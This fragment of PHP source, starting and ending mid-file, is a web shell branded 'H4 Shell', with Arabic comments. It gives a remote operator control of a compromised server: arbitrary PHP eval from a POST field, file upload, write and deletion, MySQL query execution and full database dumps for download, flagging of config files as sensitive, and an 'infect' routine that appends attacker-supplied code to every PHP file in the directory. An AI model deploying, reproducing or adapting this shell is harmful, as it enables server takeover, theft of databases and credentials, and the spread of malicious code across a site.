|
|
|
 |
OFF"; }
else { $safemode = "ON"; }
$dir = realpath($_POST['dir']);
$mkdir = $_POST['makedir'];
$mydir = $_POST['deletedir'];
$cmd = $_GET['cmd'];
$us3r = exec('id');
$p0d = exec('pwd');
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
else {$openbasedir = false; $hopenbasedir = "OFF";}
$host = $_POST['host'];
$proto = $_POST['protocol'];
$delete = $_POST['delete'];
$phpeval = $_POST['php_eval'];
$db = $_POST['db'];
$query = $_POST['query'];
$user = $_POST['user'];
$pass = $_POST['passd'];
$myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
$quotes = get_magic_quotes_gpc();
if ($quotes == "1" or $quotes == "on")
{
$quot = "ON";
}
else
{
$quot = "OFF";
}
// التصاريح
function getperms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
// الأحجام + b
$spacedir = @getcwd();
$free = @diskfreespace($spacedir);
if (!$free) {$free = 0;}
$all = @disk_total_space($spacedir);
if (!$all) {$all = 0;}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
$percentfree = intval(($free*100)/$all);
// معلومات السيرفر
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
// إنشاء ملف
$name = htmlspecialchars($_POST['names']);
$src = $_POST['source'];
if(isset($name) && isset($src))
{
if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; }
$ctd = fopen($name,"w+");
fwrite($ctd, stripslashes($src));
fclose($ctd);
echo "";
$dir = $dir.$_POST['darezz'];
chdir(realpath('.'));
}
// رفع ملف تحتاج تطوير
$path = $_FILES['ffile']['tmp_name'];
$name = $_FILES['ffile']['name'];
if(isset($path) && isset($name))
{
if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; }
if(move_uploaded_file($path, $name))
{
echo "";
}
else
{
echo "";
} }
// حذف ملف
if(isset($delete) && $delete != $dir)
{
if(file_exists($delete))
{
unlink($delete);
echo "";
}
}
// قواعد البيانات
if(isset($db) && isset($query) && isset($_POST['godb']))
{
$mysql = mysql_connect("localhost", $user, $pass)or die("");
$db = mysql_select_db($db)or die(mysql_error());
$queryz = mysql_query($query)or die(mysql_error());
if($query) { echo ""; }
else { echo ""; }
}
// الأتصال بقواعد موقع [pacucci.com]
if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
mysql_connect('localhost', $user, $pass);
mysql_select_db($db);
$tables = mysql_list_tables($db);
while ($td = mysql_fetch_array($tables))
{
$table = $td[0];
$r = mysql_query("SHOW CREATE TABLE `$table`");
if ($r)
{
$insert_sql = "";
$d = mysql_fetch_array($r);
$d[1] .= ";";
$SQL[] = str_replace("n", "", $d[1]);
$table_query = mysql_query("SELECT * FROM `$table`");
$num_fields = mysql_num_fields($table_query);
while ($fetch_row = mysql_fetch_array($table_query))
{
$insert_sql .= "INSERT INTO $table VALUES(";
for ($n=1;$n<=$num_fields;$n++)
{
$m = $n - 1;
$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
}
$insert_sql = substr($insert_sql,0,-2);
$insert_sql .= ");n";
}
if ($insert_sql!= "")
{
$SQL[] = $insert_sql;
}
}
}
$dump = "-- Database: ".$_POST['db'] ."\n";
$dump .= "-- Powered by H4 Shell\n";
$dump .= "-- Http://SA-HACKER.COM\n";
$dumpp = $dump.implode("r", $SQL);
$name = $db."-".date("d-m-y")."_by_H4_shell.sql";
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename = $name");
echo $dumpp;
die();
}
// إنشاء مجلد
if(isset($mkdir)) {
mkdir($mkdir);
if($mkdir) { echo ""; } }
// حذف مجلد
if(isset($mydir) && $mydir != "$dir") {
$d = dir($mydir);
while($entry = $d->read()) {
if ($entry !== "." && $entry !== "..") {
unlink($entry);
}
}
$d->close();
rmdir($mydir);
}
// Eval
if(isset($phpeval)) {
$eval = @str_replace("","",$phpeval);
@eval(stripslashes($eval));
die();
}
// حقن كود قابلة للتطوير
if(isset($_POST['inf3ct']))
{
foreach (glob("*.php") as $lola)
{
$dira = '.';
$asdi = fopen($lola, 'a+');
@fwrite($asdi, $_POST['cod3inf']);
@fclose($asdi);
}
if($asdi)
{
$textzz = 'تم حقن جميع الملفات بنجاح';
}
else {
$textzz = 'خطا لم يتم الحقن ';
}
}
// صور الملفات والمجلدات مشفره ومزروعة
if($_GET['com'] == "image")
{
$images = array(
"folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAGtSURBVHjaYmRgYGBazMf3lwENxH76pA2kbgPxPyDGkIcBgABiAGr+/+/zZwwMEgfKOwExFxCzQDEzEDMi6wcIIJAgw59z5zAMjn76lIFBWnovIZcBBBDYgP/v34Ml///7x8DIxASmf+3eDTEEHUhLXwUa4ghkHQUZABBAYAP+vXnD8Pf2bYb106czEAOA3tsPMwQggCAGvH4N1ozVRlxAWhpkiAVAAEG8AHQBCPw+cgQi+RcY6H/+MPz/9Qso+Jvh/48fDP9//gTa9I/h55IlDOyhoTBjXAECCO4FsEEfPgAjlQlDM8hAOP/rV4b/Hz/CDBAGCCCIAW/fgnn/QIEJtAWMYa4A2QzUDKZBfKCB/6CBDopSgACCeOHdO4gLQCaDNP//D9EE1MAA1Ai2Hc0VMAAQQKjRCPQKKArBAKQZpBiqGWw71AXIBgAEEMSAz58ZkL0CdgFUA9ggkAFQg/8DDWX4/h2m/wdAAIGSpRYwXq8ykAiAUbgKSK0HCCCQAaxAbAjEzkAsRKR+kBMuAPFegACCZQwQzQ41jBgAyp2/QCEFEECM/0H+pQAABBgAaE8F4JYoHyAAAAAASUVORK5CYII=",
"file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAASUExURZwAAM6urXtJSgAAAP///////0X/XP4AAAAGdFJOU///////ALO/pL8AAABDSURBVHjapI1LFgAgCAJJ4/5X7qOV1rJhNw8UJDWEIKXuiJrYlCUAJIFBHwRxTUykhh/JR0PjeSvOR6McpqAG2AQYAL10AzDbmKTEAAAAAElFTkSuQmCC",
"floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
);
header("Content-type: image/gif");
header("Cache-control: public");
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
header("Cache-control: max-age=".(60*60*24*7));
header("Last-Modified: ".date("r",filemtime(__FILE__)));
$image = $images[$_GET['img']];
echo base64_decode($image);
}
// أنواع الملفات ( ملف - مجلد )
chdir($dir);
if(!isset($dir)) { $dir = @realpath("."); }
if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
$pahtw = 0;
$filew = 0;
$num = 1;
if (is_dir($dir))
{
if ($open = opendir($dir))
{
if(is_dir($dir)) {
$typezz = "DIR";
$pahtw++;
}
while (($list = readdir($open)) == true)
{
if(is_dir($list)) {
$typezz = "مجلد";
$pahtw++;
$listf.= ' |  ['.$list.'] | '.$typezz.' | | ' . getperms($list) .' | '; }
else {
$lolz = filesize($list) / 1024;
$lolx = intval($lolz);
if($lolx == 0) { $lolx = 1; }
$typezz = "ملف";
$filew++;
$listz = "/".$list;
if(eregi($page,$listz)) {
$listf.= '
'.$list.' | '.
$typezz.' | ' .
$lolx .' ك ب | ' . getperms($list) . ' | '; }
elseif(eregi('conf',$listz) && eregi('.php',$listz)) { $listf.= '| '.$list.' =---------> تم العثور على ملف حساس
| '.$typezz.' | ' . $lolx .' ك ب | ' . getperms($list) . ' | '; }
else {$listf.= '| '.$list.' | '.$typezz.' | ' . $lolx .' ك ب | ' . getperms($list) . ' | '; } }
}
closedir($open);
}
$fileq = $pahtw + $filew; }
// بداية لغة html
echo "
$site ~ Shell H4
| |
